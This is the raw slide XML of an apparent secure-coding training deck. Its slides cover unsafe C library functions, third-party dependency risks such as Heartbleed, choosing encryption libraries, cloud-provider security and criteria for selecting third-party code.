            <a:schemeClr val="bg1"/>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owasp.org/index.php/OWASP_Dependency_Check"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securecoding.cert.org/confluence/display/android/Android+Secure+Coding+Standard" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/display/java/Java+Coding+Guidelines" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/display/perl/SEI+CERT+Perl+Coding+Standard" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=637" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/display/c/SEI+CERT+C+Coding+Standard"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9.pn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t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handle Vulnerabilities Due to Software Defects and Misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handle Vulnerabilities Due to Human Factors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handle Vulnerabilities Due to Process Shortcomings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handling Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1345168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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Standard libraries:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide classes, templates, subroutines, macros, global variables, and other commonly used constructs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are included with every implementation of a programming language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are treated by developers almost as part of the programming language itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are used extensively by developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May contain functions that are inherently insecure or that can easily be used inappropriately in ways that make them unsecure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, some C functions are vulnerable to buffer overflows, if used incorrectly:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bcopy()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>gets()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>scanf()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sprintf()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>strcat()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>strcopy()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>vsprintf()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problems in Standard Libraries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68017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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dependencies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1219200"/>
            <a:ext cx="8460150" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Third-party source code libraries:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Enable developers to develop faster, using functionality developed and tested by others.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>May in turn use third-party code—which would make it fourth-party code, from your perspective.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>May be of very high quality, but you shouldn't simply assume that they will be.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>OpenSSL Heartbleed vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Enabled attackers (using an exploit) to read the memory of the systems protected by the vulnerable versions of the OpenSSL software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Compromised services that used its encryption functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Was not due to a design flaw in SSL/TLS protocols, but rather a programming mistake</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The mistake was in a common code library used by 66% of Internet sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Be aware of all code dependencies your project uses (directly or indirectly), so you can monitor for vulnerabilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18953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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8421075" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python standard libraries provide hashing but not encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most developers don't have the time or experience to develop encryption that is better than what is provided in high-quality encryption libraries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recommendations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not write your own encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Carefully select which encryption libraries you use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verify it uses secure protocols.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure it has been tested and validated by the development community.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Popular Python encryption libraries include: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PyCrypto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PyCryptodome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>M2Crypto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PyOpenSSL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encryption Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB4207B3-4DB6-41C3-A271-A66E1ACE94CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20859367">
            <a:off x="6075683" y="1213098"/>
            <a:ext cx="2941913" cy="7855716"/>
            <a:chOff x="5654411" y="487849"/>
            <a:chExt cx="2720610" cy="7264776"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3078" name="Picture 6" descr="Validation, Positive, Logo, Certification, Certificated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1DA47F7-8CE1-4D68-9E69-F7418349D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237" y="2820090"/>
              <a:ext cx="2473932" cy="247393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544A1B2-0AF4-4836-A507-1EBCA9E67DC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5654411" y="3211975"/>
              <a:ext cx="2704213" cy="4540650"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:prstTxWarp prst="textArchUp">
                <a:avLst>
                  <a:gd name="adj" fmla="val 14278838"/>
                </a:avLst>
              </a:prstTxWarp>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" b="1" cap="none" spc="0" dirty="0">
                  <a:ln w="13462">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="2CB0E9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>STRONG</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E974B49-FB9D-4D1D-AB00-BEDECD4E27CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5670808" y="487849"/>
              <a:ext cx="2704213" cy="4540650"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:prstTxWarp prst="textArchDown">
                <a:avLst/>
              </a:prstTxWarp>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" b="1" cap="none" spc="0" dirty="0">
                  <a:ln w="13462">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="2CB0E9"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ENCRYPTION</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3449081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D8FD72-8E3B-4BC9-8706-21539484F332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8D7E542-CBC8-472F-8A15-AA2B1CA63244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud services:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Seem inherently less secure than on-premises, based on common-sense analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In many cases, actually provide greater security than on-premises, according to evidence.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add another layer of complexity to IT systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You should:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Work in cooperation with service providers to ensure security of data in transit and stored off-premises.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Research and test the security of external services that you use. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Study security guidelines for third-party services before you incorporate them into your systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider using a different service provider if they don’t have security guidelines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do as much as possible on your end to protect the interests of you and your customers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use multifactor authentication and encryption to protect data in transit or off-premises storage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Such protections may be required by law in industries such as banking or healthcare.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAD5F5A5-A44B-4E75-9641-253F743FD638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security of Host Systems and Service Providers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1965841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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third-party code and service may not always simplify coding effort and save time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider the following when deciding whether to use third-party code and services:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time to develop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Effort needed to verify security and other quality attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your ability to maintain and update your own software over time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limitations on how your software can be used and distributed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size and complexity of the project and/or deliverable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developer support</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine Whether to Use Third-Party Code and Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86540351-7670-44D4-B435-26FF437C5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65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AC577-582D-4E0C-8F8B-40A13178B1B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select Third-Party Code and Services for Use in Your Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D872E78C-44BF-486C-97BE-981ED3FB5135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify your requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine whether the product meets your requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Evaluate developer support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine if other developers have many problems using it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Research its security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analyze its security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test its security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid “lock-in”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Know the source</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{961A6176-DFB1-4760-9427-AB96DA40D9E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
